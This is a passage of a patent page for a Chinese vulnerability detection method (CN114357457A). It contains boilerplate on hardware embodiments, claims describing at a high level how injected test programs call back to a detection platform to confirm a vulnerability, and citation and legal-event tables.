In an exemplary embodiment, a storage medium comprising instructions, such as a memory comprising instructions, executable by the processor 710 to perform the vulnerability detection methods described above is also provided. Alternatively, the storage medium may be a non-transitory computer readable storage medium, for example, the non-transitory computer readable storage medium may be a ROM, a Random Access Memory (RAM), a CD-ROM, a magnetic tape, a floppy disk, an optical data storage device, and the like.
In an exemplary embodiment, the electronic device may also be an electronic device having a communication function, and therefore, the electronic device may include other components in addition to the processor and the memory described above. As shown in connection with fig. 8, may include: radio Frequency (RF) circuitry 810, Wireless Fidelity (Wi-Fi) module 820, communication interface 830, display unit 840, power supply 850, processor 860, memory 870, and the like. Those skilled in the art will appreciate that the configuration of the electronic device shown in fig. 8 does not constitute a limitation of the electronic device, and the electronic device provided by the embodiments of the present application may include more or less components than those shown, or may combine some components, or may be arranged in different components.
The following describes each component of the electronic device 800 in detail with reference to fig. 8:
the electronic device 800 may obtain alarm information generated by the security device within a preset time period through the RF circuit 810, the Wi-Fi module 820, and the communication module of the communication interface 830.
The RF circuitry 810 may be used for receiving and transmitting data during communication. In particular, the RF circuit 810 sends downlink data of the base station to the processor 860 for processing; and in addition, sending the uplink data to be sent to the base station. Generally, the RF circuit 810 includes, but is not limited to, an antenna, at least one Amplifier, a transceiver, a coupler, a Low Noise Amplifier (LNA), a duplexer, and the like.
In addition, the RF circuitry 810 may also communicate with networks and other electronic devices via wireless communications. The wireless communication may use any communication standard or protocol, including but not limited to Global System for Mobile communication (GSM), General Packet Radio Service (GPRS), Code Division multiple Access (Code Division multiple Access, CDMA), Wideband Code Division Multiple Access (WCDMA), Long Term Evolution (LTE), email, Short Message Service (SMS), and the like.
The Wi-Fi technology belongs to a short-distance wireless transmission technology, and the electronic device 800 may connect to an Access Point (AP) through the Wi-Fi module 820, thereby implementing Access to a data network. The Wi-Fi module 820 may be used for receiving and transmitting data during communication.
The electronic device 800 may be physically connected to other electronic devices via the communication interface 830. Optionally, the communication interface 830 is connected to the communication interface of the other electronic device through a cable, so as to implement data transmission between the electronic device 800 and the other electronic device.
In this embodiment of the application, the electronic device 800 is capable of implementing a communication service to send information to other contacts, so that the electronic device 800 needs to have a data transmission function, that is, the electronic device 800 needs to include a communication module inside. Although fig. 8 shows communication modules such as the RF circuit 810, the Wi-Fi module 820, and the communication interface 830, it is understood that at least one of the above components or other communication modules (e.g., bluetooth module) for enabling communication may be present in the electronic device 800 for data transmission.
For example, when the electronic device 800 is a computer, the electronic device 800 may include the communication interface 830 and may further include the Wi-Fi module 820; when the electronic device 800 is a tablet computer, the electronic device 800 may include the Wi-Fi module.
The display unit 840 may be used to display a page of a target application. The display unit 840 is a display system of the electronic device 800, and is configured to present an interface and implement human-computer interaction.
The display unit 840 may include a display panel 841. Alternatively, the Display panel 841 may be configured in the form of a Liquid Crystal Display (LCD), an Organic Light-Emitting Diode (OLED), or the like.
The memory 870 may be used to store software programs and modules. The processor 860 performs various functional applications and data processing of the electronic device 800 by executing software programs and modules stored in the memory 870. The memory 870 may include high speed random access memory and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other volatile solid state storage device.
The processor 860 is a control center of the electronic device 800, connects various components using various interfaces and lines, performs various functions of the electronic device 800 and processes data by operating or executing software programs and/or modules stored in the memory 870 and calling data stored in the memory 870, thereby implementing various services based on the electronic device. Wherein processor 860 includes the functionality of processor 860 in fig. 8. Optionally, the processor 860 may include one or more processing units. Optionally, the processor 860 may integrate an application processor and a modem processor, wherein the application processor mainly handles operating systems, user interfaces, application programs, and the like, and the modem processor mainly handles wireless communications. It will be appreciated that the modem processor described above may not be integrated into the processor 860.
The electronic device 800 also includes a power supply 850 (e.g., a battery) for powering the various components. Optionally, the power supply 850 may be logically connected to the processor 860 through a power management system, so as to implement functions of managing charging, discharging, and power consumption through the power management system.
In some possible embodiments, various aspects of a vulnerability detection method provided by the present application may also be implemented in the form of a program product, which includes program code for causing a computer device to execute the steps in a vulnerability detection method according to various exemplary embodiments of the present application described above in this specification when the program product is run on the computer device, for example, the program code may cause the computer device to execute the steps 201 and 204 shown in fig. 2.
The program product may employ any combination of one or more readable media. The readable medium may be a readable signal medium or a readable storage medium. A readable storage medium may be, for example, but not limited to, an electronic, magnetic, optical, electromagnetic, infrared, or semiconductor system, apparatus, or device, or any combination of the foregoing. More specific examples (a non-exhaustive list) of the readable storage medium include: an electrical connection having one or more wires, a portable diskette, a hard disk, a random access computer storage media (RAM), a read-only computer storage media (ROM), an erasable programmable read-only computer storage media (EPROM or flash memory), an optical fiber, a portable compact disc read-only computer storage media (CD-ROM), an optical computer storage media piece, a magnetic computer storage media piece, or any suitable combination of the foregoing.
It should be noted that although several modules of the apparatus are mentioned in the above detailed description, such division is merely exemplary and not mandatory. Indeed, the features and functionality of two or more of the modules described above may be embodied in one module according to embodiments of the application. Conversely, the features and functions of one module described above may be further divided into embodiments by a plurality of modules.
Further, while the operations of the methods of the present application are depicted in the drawings in a particular order, this does not require or imply that these operations must be performed in this particular order, or that all of the illustrated operations must be performed, to achieve desirable results. Additionally or alternatively, certain steps may be omitted, multiple steps combined into one step execution, and/or one step broken down into multiple step executions.
As will be appreciated by one skilled in the art, embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to the application. It will be understood that each flow and/or block of the flow diagrams and/or block diagrams, and combinations of flows and/or blocks in the flow diagrams and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
It will be apparent to those skilled in the art that various changes and modifications may be made in the present application without departing from the spirit and scope of the application. Thus, if such modifications and variations of the present application fall within the scope of the claims of the present application and their equivalents, the present application is intended to include such modifications and variations as well.
Claims (12)
1. A vulnerability detection method is applied to a first terminal device and comprises the following steps:
inputting an attack program of a target vulnerability into a target application through a vulnerability detection application, and sending the attack program to a corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
if response content returned by the server is obtained through the vulnerability detection application, analyzing the response content, and determining a trigger page of the attack program in the target application;
crawling the trigger page and executing the attack program through the vulnerability detection application to send first execution information of the attack program to the vulnerability detection platform;
and receiving alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application, and determining that the target vulnerability exists in the target application according to the alarm information.
2. The method of claim 1, wherein the entering of the target vulnerability attacker into the target application by the vulnerability detection application comprises:
inputting the content input position of the target page of the target application by the attack program of the target vulnerability through the vulnerability detection application; or
Inputting an attack program of the target vulnerability into an external link position in a page tag corresponding to a target page of the target application through the vulnerability detection application; or
And inputting the attack program of the target vulnerability into the specified attribute position in the page tag corresponding to the target page of the target application through the vulnerability detection application.
3. The method according to claim 1 or 2, wherein the parsing the response content and determining the trigger page of the attacker in the target application comprises:
analyzing the response content, and determining a trigger page of the attack program in the target application according to the analyzed page address information; or
And analyzing the response content, and determining an input page of the attack program in the target application as the trigger page according to the analyzed attack program.
4. The method according to claim 1 or 2, characterized in that the method further comprises:
if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is received, determining that the target vulnerability exists in the target application;
the alarm information of the attack program is obtained when the vulnerability detection platform receives second execution information of the attack program sent by second terminal equipment.
5. The method according to claim 1 or 2, characterized in that the method further comprises:
and if the response content returned by the server is not obtained through the vulnerability detection application and the alarm information of the attack program returned by the vulnerability detection platform is not received, determining that the target vulnerability does not exist in the target application.
6. A vulnerability detection method is applied to a vulnerability detection platform and comprises the following steps:
if first execution information of an attack program sent by a first terminal device through a vulnerability detection application is received, generating alarm information of the attack program; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in the target application through the vulnerability detection application, wherein the attack program comprises access address information of a vulnerability detection platform;
and sending the alarm information of the attack program to the vulnerability detection application of the first terminal equipment so that the vulnerability detection application determines that the target vulnerability exists in the target application.
7. The method according to claim 6, wherein the attack program includes identification information, and the sending of the warning information of the attack program to the vulnerability detection application of the terminal device based on the first execution information of the attack program includes:
acquiring identification information of the attack program from first execution information of the attack program;
and after the identification information is verified, sending alarm information of the attack program to the vulnerability detection application of the terminal equipment.
8. The method of claim 6, further comprising:
if second execution information of the attack program sent by second terminal equipment is received, generating alarm information of the attack program; and sending second execution information of the attack program after the second terminal equipment triggers the attack program in the target application.
9. The utility model provides a vulnerability detection device which characterized in that is applied to first terminal equipment, includes:
the system comprises an input module, a target application and a server, wherein the input module is used for inputting an attack program of a target vulnerability into the target application through a vulnerability detection application and sending the attack program to the corresponding server through the target application; the attack program comprises access address information of a vulnerability detection platform;
the determining module is used for analyzing the response content if the response content returned by the server is obtained through the vulnerability detection application, and determining a trigger page of the attack program in the target application;
the trigger module is used for crawling the trigger page and executing the attack program through the vulnerability detection application so as to send first execution information of the attack program to the vulnerability detection platform;
and the detection module is used for receiving the alarm information of the attack program returned by the vulnerability detection platform through the vulnerability detection application and determining that the target vulnerability exists in the target application according to the alarm information.
10. The utility model provides a vulnerability detection device which characterized in that is applied to vulnerability detection platform, includes:
the first receiving module is used for generating alarm information of an attack program if first execution information of the attack program sent by first terminal equipment through a vulnerability detection application is received; the first execution information of the attack program is sent after the first terminal device triggers the attack program of a target vulnerability in the target application through the vulnerability detection application, wherein the attack program comprises access address information of a vulnerability detection platform;
and the alarm sending module is used for sending alarm information to the vulnerability detection application of the first terminal equipment so that the vulnerability detection application determines that the target vulnerability exists in the target application.
11. An electronic device comprising a memory and a processor, the memory having stored thereon a computer program operable on the processor, the computer program, when executed by the processor, causing the processor to carry out the method of any one of claims 1 to 5, 6 to 8.
12. A computer-readable storage medium having a computer program stored therein, the computer program characterized by: the computer program, when executed by a processor, implements the method of any of claims 1-5, 6-8.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202111576762.2A CN114357457A (en) | 2021-12-22 | 2021-12-22 | Vulnerability detection method and device, electronic equipment and storage medium |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202111576762.2A CN114357457A (en) | 2021-12-22 | 2021-12-22 | Vulnerability detection method and device, electronic equipment and storage medium |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN114357457A true CN114357457A (en) | 2022-04-15 |
Family
ID=81101416
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202111576762.2A Pending CN114357457A (en) | 2021-12-22 | 2021-12-22 | Vulnerability detection method and device, electronic equipment and storage medium |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN114357457A (en) |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN114760151A (en) * | 2022-06-13 | 2022-07-15 | 宁波和利时信息安全研究院有限公司 | Method and device for acquiring authority of upper computer through PLC |
| CN114884722A (en) * | 2022-05-05 | 2022-08-09 | 五八有限公司 | Vulnerability detection method and device, electronic equipment and readable storage medium |
-
2021
- 2021-12-22 CN CN202111576762.2A patent/CN114357457A/en active Pending
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN114884722A (en) * | 2022-05-05 | 2022-08-09 | 五八有限公司 | Vulnerability detection method and device, electronic equipment and readable storage medium |
| CN114760151A (en) * | 2022-06-13 | 2022-07-15 | 宁波和利时信息安全研究院有限公司 | Method and device for acquiring authority of upper computer through PLC |
| CN114760151B (en) * | 2022-06-13 | 2022-09-13 | 宁波和利时信息安全研究院有限公司 | Method and device for acquiring authority of upper computer through PLC |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US9954855B2 (en) | Login method and apparatus, and open platform system | |
| CN104767775B (en) | Web application information push method and system | |
| US8819819B1 (en) | Method and system for automatically obtaining webpage content in the presence of javascript | |
| EP2447878B1 (en) | Web based remote malware detection | |
| US20140173736A1 (en) | Method and system for detecting webpage Trojan embedded | |
| CN108881101B (en) | Cross-site script vulnerability defense method and device based on document object model and client | |
| CN109347882B (en) | Webpage Trojan horse monitoring method, device, equipment and storage medium | |
| US20150271202A1 (en) | Method, device, and system for detecting link layer hijacking, user equipment, and analyzing server | |
| CN106339309B (en) | Application program testing method, client and system | |
| US8448260B1 (en) | Electronic clipboard protection | |
| WO2019184053A1 (en) | Method and terminal for browsing page of application | |
| CN102739663A (en) | Detection method and scanning engine of web pages | |
| US20140304839A1 (en) | Electronic clipboard protection | |
| CN114357457A (en) | Vulnerability detection method and device, electronic equipment and storage medium | |
| CN107862091B (en) | Control method and device for realizing webpage access | |
| US10972507B2 (en) | Content policy based notification of application users about malicious browser plugins | |
| EP3926918A1 (en) | Network attack defense method and apparatus, device, system and storage medium | |
| CN105791261A (en) | Detection method and detection device for cross-site scripting attack | |
| US8789177B1 (en) | Method and system for automatically obtaining web page content in the presence of redirects | |
| CN104079611A (en) | Method for preventing cross-site request forgery, related device and system | |
| CN112231711A (en) | Vulnerability detection method and device, computer equipment and storage medium | |
| US10474810B2 (en) | Controlling access to web resources | |
| CN104486292A (en) | Enterprise-resource safety-access control method, device and system | |
| US8650214B1 (en) | Dynamic frame buster injection | |
| US11128639B2 (en) | Dynamic injection or modification of headers to provide intelligence |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |